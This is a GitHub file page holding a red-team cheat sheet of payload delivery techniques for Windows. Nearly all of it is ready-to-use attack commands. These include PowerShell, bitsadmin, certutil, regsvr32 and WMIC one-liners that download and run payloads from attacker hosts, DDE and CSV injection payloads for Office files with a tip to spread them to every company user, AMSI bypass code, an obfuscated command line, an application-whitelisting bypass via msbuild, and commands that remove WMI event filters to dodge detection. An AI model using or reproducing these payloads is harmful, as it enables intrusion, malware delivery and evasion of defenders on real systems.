-
Notifications
You must be signed in to change notification settings - Fork 150
/
Payload-Delivery-Cheat-Sheet
143 lines (100 loc) · 7.68 KB
/
Payload-Delivery-Cheat-Sheet
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
***********************************************************************************************
Simple File Transfert
***********************************************************************************************
dump bin to hex:
xxd -p poc_cve_2015_0235 > dump.hex
reverse hex to bin:
xxd -p -r dump.hex > dumpfile.bin && chmod +x dumpfile.bin
bitsadmin.exe /transfer "JobName" http://192.168.1.2:8081/MeterpreterBasic.exe C:\Users\tatamaster\Desktop\t.exe
The PowerShell (wget.ps1) script to DL a final paload (Meterpreter?) when RCE:
echo $storageDir = $pwd > get.ps1
echo $webclient = New-Object System.Net.WebClient >> get.ps1
echo $url = "http://10.11.0.244:1337/evil.exe" >> get.ps1
echo $file = "msf.exe" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1
Finally it could be executed by using the following command (once the metasploit exploit/multi/handler was launched):
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
***********************************************************************************************
Windows Payload Delivery and Execution Techniques
***********************************************************************************************
DDE/CSV injections:
=cmd|'/c powershell.exe -encodedCommand JwBQAG8AQwAgAEQARABFACAAcAB3AG4AJwA= >> C:\\Users\\Default\\Desktop\\PoC.out'!_xlbgnm.A1
Payload for Word:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}
{DDEAUTO c:\\windows\\system32\\cmd.exe "/c powershell.exe -encodedCommand JwBQAG8AQwAgAEQARABFACAAcAB3AG4AJwA= >> C:\\Users\\Default\\Desktop\\PoC.out"}
Outlook:
C/P docx payload + add it into calendar invitation -> forward it to all company's users
Open browser for BeeF hooking via DDEAUTO for example:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k start chrome --new-window https://attacker.com/beef-with-valid-SSLcert/index.html"}
- In .xls(x) injection payloads use double simple quote to escape simple quote in #Powershell Iex payload (even if b64 encoded) -> DownloadString(''http://attacker.com'')
-> Exemple xlsx:
=cmd|'/c powershell.exe -command iex (new-object Net.WebClient).DownloadString(''http://trololo/f.ps1'')'!_A1
- Always use Unicode.Getbyte in PowerShell to successfully convert payloads in B64 [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("sh.ps1")))
-> Example:
#B64 Ecoding:
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("amsi-bypass.ps1")))
Write-Output $Base64| Out-File "payload-b64"
#B64 Decoding:
$bytes = [Convert]::FromBase64String($Base64)
[IO.File]::WriteAllBytes("payload-b64-decoded", $bytes)
- Payload using dropper (in memory execution) using web_delivery MSF module:
# Source: https://github.com/jaredhaight/Invoke-MetasploitPayload
powershell.exe -nop -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/jaredhaight/Invoke-MetasploitPayload/master/Invoke-MetasploitPayload.ps1')|iex; Invoke-MetasploitPayload ('http://MSF-HANDLER:8080/posh-payload')"
- Payload with Web_delivery/Meterpreter or to host with simpleHttpServer (b64 encoded) + AMSI bypass (customise your template for AV/use unicorn):
-Non updated Win10:
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$e=new-object net.webclient;
$e.proxy=[Net.WebRequest]::GetSystemWebProxy();
$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $e.downloadstring('http://attacker-trusted-domain/pwn');
- up tp date Windows 10 (27/09/2018):
[ScriptBlock]."Get`Fiel`d"('signatures','N'+'onPublic,Static').SetValue($NULL,(New-Object Collections.Generic.HashSet[string]));
$e=new-object net.webclient;
$e.proxy=[Net.WebRequest]::GetSystemWebProxy();
$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $e.downloadstring('http://192.168.56.1/MeterRsh.txt');
Steps:
create your payload using msfvenom/unicorn (meterpreter -> psh-net format hosted in "payload.txt") + handler setup -> host it -> convert AMSI bypassing payload in b64 -> execute b64 generated payload
--> More stuff about AMSI and other PowerShell based bypass:
https://github.com/kmkz/PowerShell and/or Defense-Evasion-cheat-Sheet
- Obfuscated payload example that trigger a web_delivery (or other):
-> useful for Rubber Ducky 'cause no cmd.exe/powershell.exe calls, just regsvr32 + sct file with embedded payload
ftp.exe -> !r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://attacker-Domain/policy.sct s^C^r^O^b^j.D^l^L
- XSL payload delivery (WMI) useful against restricted environments (applocker etc...)
C:\Windows\System32\WMIC.exe os get /format:"https://raw.githubusercontent.com/rasta-mouse/p0wnedLoader/master/p0wnedLoader.xsl"
- No IWR/IEX usage (no HTTP wrapper then still a specific one):
powershell -file \\UNC-PATH\payload.ps1
[*] Payloads delivery (From https://gist.github.com/HarmJ0y, most of them are triggered/blocked by MS defenses):
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1) code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
# Blue team/detection mechanisms evasion for WMI based droppers:
# (Add following line to your payload to remove Windows "Applications" EvenViewer logs)
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject
[*] Proxy aware Payloads Delivery + Code Exec. with AWL bypass (Tested on Win10 (up-to-date) with TrendMicro OfficeScan + AMSI + Active Proxy):
-> Follow the steps as described in the comment : https://raw.githubusercontent.com/kmkz/Sources/master/Shellcode.csproj
-> Dropper: certutil.exe -urlcache -split -f http://attacker.lol/example.xml C:\temp\Windows.csproj
-> Execution with undirect call to msbuild: wmic process call create "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\temp\Windows.csproj